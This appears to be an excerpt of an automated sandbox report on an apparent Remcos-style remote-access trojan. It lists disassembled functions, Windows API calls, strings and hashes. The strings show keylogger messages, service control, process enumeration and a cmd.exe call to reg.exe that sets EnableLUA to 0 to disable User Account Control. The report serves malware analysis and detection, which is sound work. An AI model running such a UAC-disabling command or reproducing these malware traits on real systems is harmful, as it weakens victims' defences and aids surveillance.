                                                        • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                        • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                        Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                        • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                        • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                        • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                        Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                        • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                        • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                        • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                        Function 00442851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PkGNG
                                                        • API String ID: 0-263838557
                                                        • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                        • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                        • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                        • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                        Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                                        • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                        • String ID: PkGNG
                                                        • API String ID: 3360349984-263838557
                                                        • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                        • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                        • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                        • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                        Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                        • wsprintfW.USER32 ref: 0040B22E
                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EventLocalTimewsprintf
                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                        • API String ID: 1497725170-248792730
                                                        • Opcode ID: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                        • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                        • Opcode Fuzzy Hash: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                        • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                        Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                        • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                        • String ID: XQG
                                                        • API String ID: 1958988193-3606453820
                                                        • Opcode ID: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                        • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                        • Opcode Fuzzy Hash: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                        • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                        Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                        • String ID: 0$MsgWindowClass
                                                        • API String ID: 2877667751-2410386613
                                                        • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                        • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                        • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                        • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                        Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                        • CloseHandle.KERNEL32(?), ref: 004077E5
                                                        • CloseHandle.KERNEL32(?), ref: 004077EA
                                                        Strings
                                                        • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandle$CreateProcess
                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                        • API String ID: 2922976086-4183131282
                                                        • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                        • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                        • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                        • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                        Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SG, xrefs: 00407715
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        • API String ID: 0-643455097
                                                        • Opcode ID: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                        • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                        • Opcode Fuzzy Hash: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                        • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                        Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                                        • SetEvent.KERNEL32(?), ref: 0040512C
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                                        • CloseHandle.KERNEL32(?), ref: 00405140
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                        • String ID: KeepAlive | Disabled
                                                        • API String ID: 2993684571-305739064
                                                        • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                        • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                        • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                        • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                        Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                        • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                        • String ID: Alarm triggered
                                                        • API String ID: 614609389-2816303416
                                                        • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                        • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                        • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                        • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                        Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                        Strings
                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                        • API String ID: 3024135584-2418719853
                                                        • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                        • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                        • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                        • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                        Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                        • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                        • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                        • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                        Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                        • _free.LIBCMT ref: 0044943D
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 00449609
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                        • String ID:
                                                        • API String ID: 1286116820-0
                                                        • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                        • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                        • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                        • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                        Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                          • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 4269425633-0
                                                        • Opcode ID: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                                        • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                        • Opcode Fuzzy Hash: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                                        • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                        Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                        • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                        • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                        • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                        Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                        • _free.LIBCMT ref: 0044F43F
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                        • String ID:
                                                        • API String ID: 336800556-0
                                                        • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                        • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                        • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                        • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                        Function 0041C482 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000), ref: 0041C4FB
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                        • String ID:
                                                        • API String ID: 1852769593-0
                                                        • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                        • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                        • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                        • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                        Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                                        • _free.LIBCMT ref: 00448353
                                                        • _free.LIBCMT ref: 0044837A
                                                        • SetLastError.KERNEL32(00000000), ref: 00448387
                                                        • SetLastError.KERNEL32(00000000), ref: 00448390
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                        • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                        • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                        • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                        Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00450A54
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 00450A66
                                                        • _free.LIBCMT ref: 00450A78
                                                        • _free.LIBCMT ref: 00450A8A
                                                        • _free.LIBCMT ref: 00450A9C
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                        • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
